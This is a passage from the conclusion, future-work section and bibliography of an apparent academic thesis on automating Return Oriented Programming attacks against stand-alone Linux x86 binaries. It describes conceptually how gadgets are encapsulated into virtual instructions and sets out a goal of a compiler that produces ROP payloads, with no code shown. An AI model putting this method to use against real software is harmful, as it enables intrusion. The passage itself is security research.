Return Oriented Programming is an interesting and crowded research area, where new
techniques are continuously explored to increase the level of sophistication and
automation of computer attacks. Chapter 2 gives an overview of the fundamentals of
the ROP technique and its variations, and provides an in-depth practical example of
a ROP attack. We showed that most of the known defence techniques either do not
provide full protection against all ROP variations, or are not widely deployed,
leaving software across different architectures vulnerable to this type of attack.
Our contribution is the development of techniques to automate the process of
creating ROP attacks within stand-alone binaries on Linux (x86) systems. The related
work (Chapter 3) indicates that most of the techniques target shared libraries or
operating system kernels, where a large number of gadgets is at one's disposal. In
Chapter 4 we discussed that this approach is not applicable to stand-alone binaries,
as a result of the reduced set of gadgets available in the machine code of
stand-alone executables.
Therefore we proposed methods to automatically generate virtual instructions, by
encapsulating gadgets with extra instructions such that they operate on memory
locations instead of registers or the stack. We carefully took into consideration
each side effect caused by the use of the available gadgets having single or
multiple instructions, so that the generated virtual instructions handle the side
effects considered. We built the encapsulation process using a register transfer
graph, which is used to analyse the data movements between the CPU registers and
memory, and to ensure that the user is able to read from memory, perform an
arbitrary operation and write the result back to memory. Finally (Chapter 5), we
have shown that this approach is able to encapsulate most of the arithmetic and
logic instructions, as well as control flow and comparison instructions, which is in
most cases sufficient to create a ROP attack.
6.2 Future Work
To give a short insight into our future plans, we classify our ideas in two parts:
points that will be in our focus in the short run, and goals that we aim to
investigate in the long run.
In the short run:
• Currently the system lacks a proper mechanism to provide automatic condi-
tional branching. This is due to the fact that conditional branching is usually
done by exploiting the CF flag, to provide comparison of the type a < b. The
system should be extended to support gadget chaining to perform conditional
jumping and automatic calculation of the jump offsets when virtual instructions
are used.
In the long run:
• While most of the related work concentrates on providing a Turing-complete set of
instructions, our approach tries to encapsulate as many operations as possible,
without considering Turing completeness. Because the method produces virtual
instructions and virtual registers, it provides the flexibility to incorporate
different models of Turing completeness, abstracted at the level of virtual
instructions. This is especially useful when a particular virtual instruction is
not available, since the system can still ensure Turing completeness by choosing a
different or less complicated model.
• Being able to provide virtual instructions and virtual registers (located in
memory), the system is potentially able to implement a virtual stack as well, and
to implement wrappers for simplified function calls in the ROP attack.
• Finally, the ultimate use case of this work would be a compiler able to create
fully automatic ROP attacks for arbitrary code written in a dedicated language.
This compiler would ideally use the virtual instructions, registers and stack as
an assembly abstraction to compile the dedicated language into an attack payload.
Bibliography
[1] H. Shacham, “The geometry of innocent flesh on the bone: return-into-libc
without function calls (on the x86),” in ACM Conference on Computer and Com-
munications Security, pp. 552–561, 2007.
[2] E. Buchanan, R. Roemer, H. Shacham, and S. Savage, “When good instructions
go bad: generalizing return-oriented programming to RISC,” in ACM Conference
on Computer and Communications Security, pp. 27–38, 2008.
[3] T. Kornau, “Return Oriented Programming for the ARM Architecture,” Master’s
thesis, University Ruhr Bochum, December 2009.
[4] A. Francillon, D. Perito, and C. Castelluccia, “Defending embedded systems
against control flow attacks,” in Proceedings of the first ACM workshop on Secure
execution of untrusted code, SecuCode ’09, (New York, NY, USA), pp. 19–26, ACM,
2009.
[5] F. Lindner, “Router exploitation,” tech. rep., Recurity Labs, 2008. http://www.
recurity-labs.com/content/pub/FX_Router_Exploitation.pdf.
[6] S. Checkoway, A. J. Feldman, B. Kantor, J. A. Halderman, E. W. Felten, and
H. Shacham, “Can DREs provide long-lasting security? The case of return-oriented
programming and the AVC Advantage,” in Proceedings of EVT 2009, (Montreal,
Canada), USENIX/ACCURATE, July 2009.
[7] PaX Team, “PaX non-executable pages design & implementation,” 2005. http:
//pax.grsecurity.net/docs/noexec.txt.
[8] PaX Team, “PaX address space layout randomization,” 2003. http://pax.grsecurity.
net/docs/aslr.txt.
[9] I. Molnar and A. van de Ven, “New Security Enhancements in Red Hat Enterprise
Linux v.3, update 3,” 2004. http://www.redhat.com/f/pdf/rhel/WHP0006US_
Execshield.pdf.
[10] J. Li, Z. Wang, X. Jiang, M. C. Grace, and S. Bahram, “Defeating return-oriented
rootkits with "return-less" kernels,” in EuroSys, pp. 195–208, 2010.
[11] J. Jiang, X. Jia, D. Feng, S. Zhang, and P. Liu, “Hypercrop: a hypervisor-based
countermeasure for return oriented programming,” in Proceedings of the 13th
international conference on Information and communications security, ICICS’11,
(Berlin, Heidelberg), pp. 360–373, Springer-Verlag, 2011.
[12] L. Davi, A.-R. Sadeghi, and M. Winandy, “ROPdefender: a detection tool to defend
against return-oriented programming attacks,” in ASIACCS, pp. 40–51, 2011.
[13] K. Onarlioglu, L. Bilge, A. Lanzi, D. Balzarotti, and E. Kirda, “G-free: defeating
return-oriented programming through gadget-less binaries,” in ACSAC, pp. 49–58,
2010.
[14] M. Abadi, M. Budiu, U. Erlingsson, and J. Ligatti, “Control-flow integrity prin-
ciples, implementations, and applications,” ACM Trans. Inf. Syst. Secur., vol. 13,
pp. 4:1–4:40, Nov. 2009.
[15] T. Bletsch, X. Jiang, and V. Freeh, “Mitigating code-reuse attacks with control-
flow locking,” in Proceedings of the 27th Annual Computer Security Applications
Conference, ACSAC ’11, (New York, NY, USA), pp. 353–362, ACM, 2011.
[16] E. J. Schwartz, T. Avgerinos, and D. Brumley, “Q: Exploit hardening made easy,”
in Proceedings of the USENIX Security Symposium, 2011.
[17] M. Tran, M. Etheridge, T. Bletsch, X. Jiang, V. Freeh, and P. Ning, “On the expres-
siveness of return-into-libc attacks,” in 14th International Symposium on Recent
Advances in Intrusion Detection (RAID 2011), 2011.
[18] T. Dullien, T. Kornau, and R.-P. Weinmann, “A framework for automated
architecture-independent gadget search,” in Proceedings of the 4th USENIX con-
ference on Offensive technologies, WOOT’10, (Berkeley, CA, USA), pp. 1–, USENIX
Association, 2010.
[19] R. Hund, T. Holz, and F. C. Freiling, “Return-oriented rootkits: Bypassing kernel
code integrity protection mechanisms,” in USENIX Security Symposium, pp. 383–
398, 2009.
[20] E. Levy (Aleph One), “Smashing the stack for fun and profit,” tech. rep., Phrack
49, 1996. http://insecure.org/stf/smashstack.html.
[21] Anonymous, “Once upon a free()...,” tech. rep., Phrack 57, 2001.
http://www.phrack.org/archives/57/p57_0x09_Once%20upon%20a%20free()_by_anonymous%20author.txt.
[22] Blexim, “Basic integer overflows,” tech. rep., Phrack 60, 2002.
http://www.phrack.org/archives/60/p60_0x0a_Basic%20Integer%20Overflows_by_blexim.txt.
[23] G. Richarte and R. Quesada, “Advances in format string exploitation,” tech. rep.,
Phrack 59, 2001. http://phrack.org/issues.html?issue=59&id=7.
[24] J. P. Anderson, “Computer Security Technology Planning Study,” vol. 2, p. 61,
1972.
[25] J. Dressler, Cases and Materials on Criminal Law. West, fifth ed., 2009.
[26] T. Lopatic, “Vulnerability in NCSA HTTPD 1.3,” tech. rep., 1995.
http://web.archive.org/web/20070901222723/http://www.security-express.com/archives/bugtraq/1995_1/0403.html.
[27] R. Wojtczuk, “Defeating solar designer’s non-executable stack patch,” tech. rep.,
1998. http://insecure.org/sploits/non-executable.stack.problems.html.
[28] N. Smith, “Smashing the Stack: prevention?,” tech. rep., 1997.
http://seclists.org/bugtraq/1997/Apr/125.
[29] J. McDonald, “Defeating Solaris/SPARC Non-Executable Stack Protection,” tech.
rep., 1999. http://www.thc.org/root/docs/exploit_writing/sol-ne-stack.html.
[30] L. Granquist, “Future of buffer overflows ?,” tech. rep., 2000.
http://seclists.org/bugtraq/2000/Nov/13.
[31] R. Wojtczuk, “The advanced return-into-lib(c) exploits,” tech. rep., Phrack 58,
2001. http://phrack.org/issues.html?issue=58&id=4.
[32] R. Permeh and M. Maiffret, “ANALYSIS: .ida ‘Code Red’ Worm,” tech. rep.,
eEye Digital Security, 2001.
http://www.eeye.com/Resources/Security-Center/Research/Security-Advisories/AL20010717.
[33] S. Krahmer, “x86-64 buffer overflow exploits and the borrowed code chunks
exploitation technique,” tech. rep., SUSE, 2005.
http://www.suse.de/~krahmer/no-nx.pdf.
[34] S. Checkoway, L. Davi, A. Dmitrienko, A.-R. Sadeghi, H. Shacham, and
M. Winandy, “Return-oriented programming without returns,” in ACM Con-
ference on Computer and Communications Security, pp. 559–572, 2010.
[35] T. K. Bletsch, X. Jiang, V. W. Freeh, and Z. Liang, “Jump-oriented programming: a
new class of code-reuse attack,” in ASIACCS, pp. 30–40, 2011.
[36] K. Lu, D. Zou, W. Wen, and D. Gao, “Packed, printable, and polymorphic
return-oriented programming,” in 14th International Symposium on Recent
Advances in Intrusion Detection (RAID 2011), 2011.
[37] R. Roemer, E. Buchanan, H. Shacham, and S. Savage, “Return-oriented program-
ming: Systems, languages, and applications,” Trans. Info. & Sys. Sec., 2011. To
appear.
[38] Microsoft, “A detailed description of the Data Execution Prevention (DEP) feature
in Windows XP Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows
Server 2003,” 2006. http://support.microsoft.com/kb/875352.
[39] H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh, “On the
effectiveness of address-space randomization,” in ACM Conference on Computer
and Communications Security, pp. 298–307, 2004.
[40] P. Barham, B. Dragovic, K. Fraser, S. Hand, T. Harris, A. Ho, R. Neugebauer, I. Pratt,
and A. Warfield, “Xen and the art of virtualization,” SIGOPS Oper. Syst. Rev., vol. 37,
pp. 164–177, Oct. 2003.
[41] N. Nethercote, Dynamic binary analysis and instrumentation. PhD thesis, Uni-
versity of Cambridge, 2004.
[42] M. Frantzen and M. Shuey, “Stackghost: Hardware facilitated stack protection,”
in Proceedings of the 10th conference on USENIX Security Symposium - Volume
10, SSYM’01, (Berkeley, CA, USA), pp. 5–5, USENIX Association, 2001.
[43] U. Erlingsson, M. Abadi, M. Vrable, M. Budiu, and G. C. Necula, “XFI:
software guards for system address spaces,” in Proceedings of the 7th USENIX
Symposium on Operating Systems Design and Implementation - Volume 7, OSDI
’06, (Berkeley, CA, USA), pp. 6–6, USENIX Association, 2006.
[44] S. McCamant, “Efficient, verifiable binary sandboxing for a CISC architecture,”
tech. rep., MIT Computer Science and Artificial Intelligence Laboratory, 2005.
[45] F. Mavaddat and B. Parhami, URISC: the Ultimate Reduced Instruction Set
Computer. Research report, Faculty of Mathematics, University of Waterloo,
1987.